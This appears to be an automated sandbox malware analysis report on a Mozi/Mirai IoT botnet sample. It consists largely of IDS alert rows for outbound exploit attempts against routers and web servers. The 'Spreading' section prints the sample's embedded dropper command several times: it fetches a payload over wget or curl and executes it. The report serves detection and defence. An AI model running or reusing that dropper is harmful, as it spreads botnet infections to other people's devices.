                            2024-12-11T00:43:47.380039+010020290341Web Application Attack192.168.2.2342004180.145.130.5180TCP
                            2024-12-11T00:43:47.382960+010020290341Web Application Attack192.168.2.233305856.243.106.1198080TCP
                            2024-12-11T00:43:48.283369+010020290341Web Application Attack192.168.2.2360572206.80.60.18449152TCP
                            2024-12-11T00:43:48.319787+010020290341Web Application Attack192.168.2.233388460.213.88.807574TCP
                            2024-12-11T00:43:48.320157+010020290341Web Application Attack192.168.2.2332946143.92.171.2388080TCP
                            2024-12-11T00:43:48.322712+010020290341Web Application Attack192.168.2.2356222115.253.80.16949152TCP
                            2024-12-11T00:43:48.339396+010020290341Web Application Attack192.168.2.2342566109.243.209.447574TCP
                            2024-12-11T00:43:48.361009+010020290341Web Application Attack192.168.2.235065286.216.243.1297574TCP
                            2024-12-11T00:43:48.377987+010020290341Web Application Attack192.168.2.2355628178.22.168.2649152TCP
                            2024-12-11T00:43:49.285695+010020290341Web Application Attack192.168.2.2335918153.25.192.827574TCP
                            2024-12-11T00:43:49.302433+010020290341Web Application Attack192.168.2.2355360126.188.12.12680TCP
                            2024-12-11T00:43:49.329339+010020290341Web Application Attack192.168.2.2360386166.190.152.4280TCP
                            2024-12-11T00:43:49.386160+010020290341Web Application Attack192.168.2.2360148164.163.173.15449152TCP
                            2024-12-11T00:43:49.386916+010020290341Web Application Attack192.168.2.23464203.124.127.18549152TCP
                            2024-12-11T00:43:50.279743+010020290341Web Application Attack192.168.2.2346258128.148.246.688080TCP
                            2024-12-11T00:43:50.286667+010020290341Web Application Attack192.168.2.2341916126.151.72.1195555TCP
                            2024-12-11T00:43:50.300102+010020290341Web Application Attack192.168.2.233659650.110.115.308080TCP
                            2024-12-11T00:43:50.307025+010020290341Web Application Attack192.168.2.2336082186.43.106.24080TCP
                            2024-12-11T00:43:50.359743+010020290341Web Application Attack192.168.2.2356938125.216.231.23980TCP
                            2024-12-11T00:43:50.367007+010020290341Web Application Attack192.168.2.234577230.60.58.1838080TCP
                            2024-12-11T00:43:50.383779+010020290341Web Application Attack192.168.2.2353432156.42.96.2475555TCP
                            2024-12-11T00:43:50.983947+010020290341Web Application Attack192.168.2.2342970113.43.249.22849152TCP
                            2024-12-11T00:43:51.281280+010020290341Web Application Attack192.168.2.233395620.68.156.1588080TCP
                            2024-12-11T00:43:51.293449+010020290341Web Application Attack192.168.2.235194479.149.151.1880TCP
                            2024-12-11T00:43:51.296388+010020290341Web Application Attack192.168.2.2337162191.46.111.11949152TCP
                            2024-12-11T00:43:51.296762+010020290341Web Application Attack192.168.2.235691458.68.44.8780TCP
                            2024-12-11T00:43:51.297133+010020290341Web Application Attack192.168.2.234029415.16.177.995555TCP
                            2024-12-11T00:43:51.300046+010020290341Web Application Attack192.168.2.2345108114.23.158.9580TCP
                            2024-12-11T00:43:51.315329+010020290341Web Application Attack192.168.2.233711036.251.164.1227574TCP
                            2024-12-11T00:43:51.319346+010020290341Web Application Attack192.168.2.2360036121.2.173.427574TCP
                            2024-12-11T00:43:51.320086+010020290341Web Application Attack192.168.2.2335814124.232.34.05555TCP
                            2024-12-11T00:43:51.343264+010020290341Web Application Attack192.168.2.2335688130.4.44.24980TCP
                            2024-12-11T00:43:51.363732+010020290341Web Application Attack192.168.2.2336814124.76.112.2108080TCP
                            2024-12-11T00:43:51.847899+010020290341Web Application Attack192.168.2.235300446.201.228.768080TCP
                            2024-12-11T00:43:52.283546+010020290341Web Application Attack192.168.2.2350626105.87.20.198080TCP
                            2024-12-11T00:43:52.291144+010020290341Web Application Attack192.168.2.2353770128.132.200.767574TCP
                            2024-12-11T00:43:52.291520+010020290341Web Application Attack192.168.2.2358920214.208.107.1135555TCP
                            2024-12-11T00:43:52.311957+010020290341Web Application Attack192.168.2.234301413.238.239.23549152TCP
                            2024-12-11T00:43:52.316549+010020290341Web Application Attack192.168.2.2360082139.233.195.2198080TCP
                            2024-12-11T00:43:52.335743+010020290341Web Application Attack192.168.2.2344398182.52.150.1267574TCP
                            2024-12-11T00:43:52.359503+010020290341Web Application Attack192.168.2.2336336120.228.91.1267574TCP
                            2024-12-11T00:43:52.380181+010020290341Web Application Attack192.168.2.2333408126.196.147.4749152TCP
                            2024-12-11T00:43:53.303360+010020290341Web Application Attack192.168.2.2357996163.142.85.497574TCP
                            2024-12-11T00:43:53.310248+010020290341Web Application Attack192.168.2.233637642.123.190.338080TCP
                            2024-12-11T00:43:53.312786+010020290341Web Application Attack192.168.2.234425283.231.181.23249152TCP
                            2024-12-11T00:43:53.329177+010020290341Web Application Attack192.168.2.2338378133.132.31.12149152TCP
                            2024-12-11T00:43:53.337951+010020290341Web Application Attack192.168.2.2350968220.157.125.17849152TCP
                            2024-12-11T00:43:53.343809+010020290341Web Application Attack192.168.2.23544645.127.178.19749152TCP
                            2024-12-11T00:43:53.348916+010020290341Web Application Attack192.168.2.2336422165.102.249.298080TCP
                            2024-12-11T00:43:53.349645+010020290341Web Application Attack192.168.2.234863082.201.90.5880TCP
                            2024-12-11T00:43:53.350383+010020290341Web Application Attack192.168.2.2343248190.58.45.8780TCP
                            2024-12-11T00:43:53.350763+010020290341Web Application Attack192.168.2.233329275.117.165.285555TCP
                            2024-12-11T00:43:53.359235+010020290341Web Application Attack192.168.2.234652265.103.37.428080TCP
                            2024-12-11T00:43:53.365433+010020290341Web Application Attack192.168.2.233990643.240.202.14049152TCP
                            2024-12-11T00:43:54.281882+010020290341Web Application Attack192.168.2.2343954153.243.22.4680TCP
                            2024-12-11T00:43:54.299810+010020290341Web Application Attack192.168.2.2359272101.161.105.2137574TCP
                            2024-12-11T00:43:54.300546+010020290341Web Application Attack192.168.2.233862236.252.136.22480TCP
                            2024-12-11T00:43:54.304920+010020290341Web Application Attack192.168.2.235697891.36.210.1545555TCP
                            2024-12-11T00:43:54.313305+010020290341Web Application Attack192.168.2.2356300184.115.100.1635555TCP
                            2024-12-11T00:43:54.334735+010020290341Web Application Attack192.168.2.2352664205.160.164.4180TCP
                            2024-12-11T00:43:54.353235+010020290341Web Application Attack192.168.2.234336865.30.252.2377574TCP
                            2024-12-11T00:43:54.353607+010020290341Web Application Attack192.168.2.2358198148.241.176.495555TCP
                            2024-12-11T00:43:54.368367+010020290341Web Application Attack192.168.2.2347876139.34.68.1255555TCP
                            2024-12-11T00:43:54.374553+010020290341Web Application Attack192.168.2.235571832.154.86.12980TCP
                            2024-12-11T00:43:54.991377+010020290341Web Application Attack192.168.2.2338586126.34.221.1977574TCP
                            2024-12-11T00:43:55.284241+010020290341Web Application Attack192.168.2.2339862184.184.118.787574TCP
                            2024-12-11T00:43:55.291881+010020290341Web Application Attack192.168.2.233711282.181.66.380TCP
                            2024-12-11T00:43:55.299498+010020290341Web Application Attack192.168.2.235243236.97.33.18749152TCP
                            2024-12-11T00:43:55.304956+010020290341Web Application Attack192.168.2.2359112102.56.202.22580TCP
                            2024-12-11T00:43:55.331787+010020290341Web Application Attack192.168.2.2360564211.23.135.1208080TCP
                            2024-12-11T00:43:55.344162+010020290341Web Application Attack192.168.2.2353128193.31.48.987574TCP
                            2024-12-11T00:43:55.354426+010020290341Web Application Attack192.168.2.23505744.3.110.08080TCP
                            2024-12-11T00:43:55.355161+010020290341Web Application Attack192.168.2.234833273.52.189.1227574TCP
                            2024-12-11T00:43:55.366780+010020290341Web Application Attack192.168.2.2340940191.76.14.22380TCP
                            2024-12-11T00:43:56.288623+010020290341Web Application Attack192.168.2.2342166204.128.136.1388080TCP
                            2024-12-11T00:43:56.295483+010020290341Web Application Attack192.168.2.2349556219.249.5.1128080TCP
                            2024-12-11T00:43:56.321738+010020290341Web Application Attack192.168.2.235741616.56.252.1378080TCP
                            2024-12-11T00:43:56.347919+010020290341Web Application Attack192.168.2.2340264110.24.108.2117574TCP
                            2024-12-11T00:43:57.280236+010020290341Web Application Attack192.168.2.2337364141.61.164.1165555TCP
                            2024-12-11T00:43:57.295643+010020290341Web Application Attack192.168.2.2357556112.110.69.178080TCP
                            2024-12-11T00:43:57.327795+010020290341Web Application Attack192.168.2.2339172165.215.144.10949152TCP
                            2024-12-11T00:43:57.341006+010020290341Web Application Attack192.168.2.235969872.133.204.1508080TCP
                            2024-12-11T00:43:57.362391+010020290341Web Application Attack192.168.2.233858818.56.150.5580TCP
                            2024-12-11T00:43:57.373255+010020290341Web Application Attack192.168.2.2347838148.163.41.367574TCP
                            2024-12-11T00:43:57.383225+010020290341Web Application Attack192.168.2.2356660182.41.168.580TCP
                            2024-12-11T00:43:58.287804+010020290341Web Application Attack192.168.2.2352954190.249.160.2377574TCP
                            2024-12-11T00:43:58.312982+010020290341Web Application Attack192.168.2.2342338199.4.231.1275555TCP
                            2024-12-11T00:43:58.319565+010020290341Web Application Attack192.168.2.2341090213.120.222.21980TCP
                            2024-12-11T00:43:58.363352+010020290341Web Application Attack192.168.2.234644046.12.15.937574TCP
                            2024-12-11T00:43:59.321666+010020290341Web Application Attack192.168.2.235598012.62.192.19449152TCP
                            2024-12-11T00:43:59.336327+010020290341Web Application Attack192.168.2.2356456138.194.129.1967574TCP
                            2024-12-11T00:43:59.340233+010020290341Web Application Attack192.168.2.2336494212.30.42.8249152TCP
                            2024-12-11T00:44:00.190810+010020290341Web Application Attack192.168.2.2354558175.180.83.2248080TCP
                            2024-12-11T00:44:00.279287+010020290341Web Application Attack192.168.2.235781475.151.1.3349152TCP
                            2024-12-11T00:44:00.285272+010020290341Web Application Attack192.168.2.2357832204.117.44.1647574TCP
                            2024-12-11T00:44:00.303101+010020290341Web Application Attack192.168.2.2338474148.70.224.2105555TCP
                            2024-12-11T00:44:00.332326+010020290341Web Application Attack192.168.2.2345806142.5.217.8180TCP
                            2024-12-11T00:44:00.379900+010020290341Web Application Attack192.168.2.2350720217.188.69.1545555TCP
                            2024-12-11T00:44:01.285279+010020290341Web Application Attack192.168.2.2333980185.183.174.1695555TCP
                            2024-12-11T00:44:01.321105+010020290341Web Application Attack192.168.2.2338078110.121.213.1505555TCP
                            2024-12-11T00:44:01.322948+010020290341Web Application Attack192.168.2.235848436.117.67.1185555TCP
                            2024-12-11T00:44:01.378991+010020290341Web Application Attack192.168.2.2358088210.37.54.13949152TCP
                            2024-12-11T00:44:02.310475+010020290341Web Application Attack192.168.2.235118089.2.89.845555TCP
                            2024-12-11T00:44:02.336275+010020290341Web Application Attack192.168.2.2350660143.57.215.24480TCP
                            2024-12-11T00:44:02.347931+010020290341Web Application Attack192.168.2.2357510147.253.7.20649152TCP
                            2024-12-11T00:44:02.352667+010020290341Web Application Attack192.168.2.234603268.231.125.180TCP
                            2024-12-11T00:44:02.369171+010020290341Web Application Attack192.168.2.235318096.190.191.6880TCP
                            2024-12-11T00:44:02.374269+010020290341Web Application Attack192.168.2.233904659.119.110.1468080TCP
                            2024-12-11T00:44:03.286655+010020290341Web Application Attack192.168.2.2356438159.166.66.22680TCP
                            2024-12-11T00:44:03.308189+010020290341Web Application Attack192.168.2.2350938147.235.125.21580TCP
                            2024-12-11T00:44:03.323178+010020290341Web Application Attack192.168.2.235456032.113.47.18280TCP
                            2024-12-11T00:44:03.343455+010020290341Web Application Attack192.168.2.2355552208.178.221.938080TCP
                            2024-12-11T00:44:03.382558+010020290341Web Application Attack192.168.2.234659621.158.101.725555TCP
                            2024-12-11T00:44:03.388766+010020290341Web Application Attack192.168.2.2346614116.71.218.1138080TCP
                            2024-12-11T00:44:04.285748+010020290341Web Application Attack192.168.2.233889817.171.111.87574TCP
                            2024-12-11T00:44:04.294352+010020290341Web Application Attack192.168.2.234840420.93.46.568080TCP
                            2024-12-11T00:44:04.304832+010020290341Web Application Attack192.168.2.2350676120.82.140.13549152TCP
                            2024-12-11T00:44:04.314111+010020290341Web Application Attack192.168.2.2357520121.27.111.295555TCP
                            2024-12-11T00:44:04.323773+010020290341Web Application Attack192.168.2.2342236153.180.40.1305555TCP
                            2024-12-11T00:44:04.346775+010020290341Web Application Attack192.168.2.233714889.176.240.19080TCP
                            2024-12-11T00:44:04.361763+010020290341Web Application Attack192.168.2.2335004137.225.175.2058080TCP
                            2024-12-11T00:44:04.385952+010020290341Web Application Attack192.168.2.2346198213.205.169.7080TCP
                            2024-12-11T00:44:04.878039+010020290341Web Application Attack192.168.2.23587903.8.236.2287574TCP
                            2024-12-11T00:44:05.306868+010020290341Web Application Attack192.168.2.234825270.156.83.1835555TCP
                            2024-12-11T00:44:05.315821+010020290341Web Application Attack192.168.2.233529031.243.87.20049152TCP
                            2024-12-11T00:44:05.317391+010020290341Web Application Attack192.168.2.235258025.45.221.2255555TCP
                            2024-12-11T00:44:05.355163+010020290341Web Application Attack192.168.2.233278277.84.251.2397574TCP
                            2024-12-11T00:44:05.372329+010020290341Web Application Attack192.168.2.235994239.76.9.18949152TCP
                            2024-12-11T00:44:06.288795+010020290341Web Application Attack192.168.2.2346118214.64.175.22880TCP
                            2024-12-11T00:44:06.295364+010020290341Web Application Attack192.168.2.2354140140.219.139.21749152TCP
                            2024-12-11T00:44:06.303724+010020290341Web Application Attack192.168.2.2338144146.143.230.22949152TCP
                            2024-12-11T00:44:06.313190+010020290341Web Application Attack192.168.2.2353762221.0.197.1895555TCP
                            2024-12-11T00:44:06.322731+010020290341Web Application Attack192.168.2.2352306208.135.113.12780TCP
                            2024-12-11T00:44:06.336012+010020290341Web Application Attack192.168.2.2343904199.21.178.135555TCP
                            2024-12-11T00:44:06.336426+010020290341Web Application Attack192.168.2.23465701.131.77.1917574TCP
                            2024-12-11T00:44:06.345315+010020290341Web Application Attack192.168.2.2355506217.93.60.980TCP
                            2024-12-11T00:44:06.359885+010020290341Web Application Attack192.168.2.236010085.107.234.1768080TCP
                            2024-12-11T00:44:07.300740+010020290341Web Application Attack192.168.2.2341442123.17.139.1787574TCP
                            2024-12-11T00:44:07.320798+010020290341Web Application Attack192.168.2.235295492.197.11.10749152TCP
                            2024-12-11T00:44:07.321904+010020290341Web Application Attack192.168.2.23596984.88.106.19580TCP
                            2024-12-11T00:44:07.335898+010020290341Web Application Attack192.168.2.2345338159.41.41.5980TCP
                            2024-12-11T00:44:07.347981+010020290341Web Application Attack192.168.2.2351528102.95.198.3149152TCP
                            2024-12-11T00:44:07.372219+010020290341Web Application Attack192.168.2.2355786109.9.205.12380TCP
                            2024-12-11T00:44:07.372597+010020290341Web Application Attack192.168.2.2347396213.205.7.1428080TCP
                            2024-12-11T00:44:08.319776+010020290341Web Application Attack192.168.2.2343714187.36.28.308080TCP
                            2024-12-11T00:44:08.336001+010020290341Web Application Attack192.168.2.23510407.245.225.849152TCP
                            2024-12-11T00:44:08.345922+010020290341Web Application Attack192.168.2.235324232.47.171.16480TCP
                            2024-12-11T00:44:08.725493+010020290341Web Application Attack192.168.2.234930462.24.138.2280TCP
                            2024-12-11T00:44:09.285920+010020290341Web Application Attack192.168.2.2348964123.153.95.1947574TCP
                            2024-12-11T00:44:09.295231+010020290341Web Application Attack192.168.2.2342368210.0.231.23680TCP
                            2024-12-11T00:44:09.321728+010020290341Web Application Attack192.168.2.2340710125.214.113.19049152TCP
                            2024-12-11T00:44:09.350616+010020290341Web Application Attack192.168.2.233475462.222.101.1458080TCP
                            2024-12-11T00:44:09.383184+010020290341Web Application Attack192.168.2.233761815.239.99.19680TCP
                            2024-12-11T00:44:10.300385+010020290341Web Application Attack192.168.2.2351662177.57.59.1297574TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: Mozi.m.elfAvira: detected
                            Source: /usr/networksAvira: detection malicious, Label: EXP/ELF.Mirai.O
                            Source: Mozi.m.elfReversingLabs: Detection: 63%

                            Spreading

                            barindex
                            Source: /tmp/Mozi.m.elf (PID: 6268)Opens: /proc/net/routeJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6268)Opens: /proc/net/routeJump to behavior
                            Source: Mozi.m.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: Mozi.m.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                            Source: Mozi.m.elfString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: networks.14.drString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: networks.14.drString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                            Source: networks.14.drString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

                            Networking

                            barindex
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53258 -> 163.152.100.25:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:47902 -> 13.239.19.86:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50214 -> 125.133.16.27:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50400 -> 216.18.254.161:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58940 -> 87.120.225.117:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:45140 -> 124.39.196.18:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46270 -> 76.227.143.215:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51682 -> 54.78.250.89:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59228 -> 123.175.241.125:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:48522 -> 178.51.3.128:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46640 -> 34.136.79.41:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:42494 -> 221.40.54.221:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41912 -> 152.158.234.19:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:35038 -> 61.237.100.81:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:60168 -> 220.15.89.10:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42154 -> 71.44.225.112:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:45240 -> 161.199.124.145:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:42994 -> 14.232.148.193:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47894 -> 206.142.193.152:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40994 -> 134.220.93.111:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44012 -> 79.10.209.34:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38010 -> 221.42.76.51:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:59284 -> 31.20.181.48:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48516 -> 186.251.44.209:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:58972 -> 79.39.229.25:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60422 -> 184.96.7.28:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55264 -> 9.58.179.109:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:33938 -> 202.202.168.64:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54774 -> 204.81.207.188:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:58202 -> 29.105.29.159:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54806 -> 143.186.21.173:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55738 -> 154.140.14.6:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54192 -> 186.173.246.164:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54192 -> 186.173.246.164:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:41766 -> 179.117.226.194:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55738 -> 154.140.14.6:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56424 -> 47.30.123.212:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44056 -> 191.251.39.30:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33870 -> 48.214.85.13:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54880 -> 23.173.106.27:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58324 -> 201.200.12.116:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43262 -> 113.146.56.79:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49094 -> 192.135.140.135:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54080 -> 110.142.198.158:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52520 -> 140.9.134.133:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38632 -> 56.53.8.6:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53384 -> 162.198.43.227:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40630 -> 9.109.75.127:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50126 -> 32.170.33.253:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34024 -> 193.94.36.43:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46432 -> 203.29.198.208:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42356 -> 166.192.145.39:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39352 -> 222.38.112.228:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:38568 -> 211.70.46.51:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48218 -> 93.31.4.225:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:59336 -> 34.57.137.153:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46252 -> 9.70.45.227:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43226 -> 206.130.7.22:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45404 -> 50.91.199.9:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42856 -> 108.85.179.160:49152
